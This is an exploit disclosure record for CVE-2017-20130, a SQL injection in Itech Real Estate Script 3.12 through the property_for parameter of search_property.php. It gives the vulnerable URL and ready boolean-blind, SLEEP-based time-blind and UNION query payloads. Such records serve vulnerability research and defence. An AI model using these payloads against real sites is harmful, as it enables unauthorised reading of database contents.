Headline
CVE-2017-20130: Offensive Security’s Exploit Database Archive
A vulnerability was found in Itech Real Estate Script 3.12. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /real-estate-script/search_property.php. The manipulation of the argument property_for leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
Exploit Title: Itech Real Estate Script v3.12 – SQL Injection
Date: 30.01.2017
Vendor Homepage: http://itechscripts.com/
Software Link: http://itechscripts.com/real-estate-script/
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
Itech Real Estate Script v3.12 is a robust platform for launching real-estate portals. This script is currently available under a special pricing of US$199.
Type of vulnerability:
An SQL Injection vulnerability in Itech Real Estate Script v3.12 allows attackers to read
arbitrary data from the database.
Vulnerability:
http://localhost/real-estate-script/search_property.php?property_for=1[payload]
Parameter: property_for (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: property_for=1 AND 4574=4574
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: property_for=1 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: property_for=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176707a71,0x65546e587a4d65446c625876704b7a784d6651575074684f516f43486d716f5844664870577a6d43,0x7178626b71)-- zLWo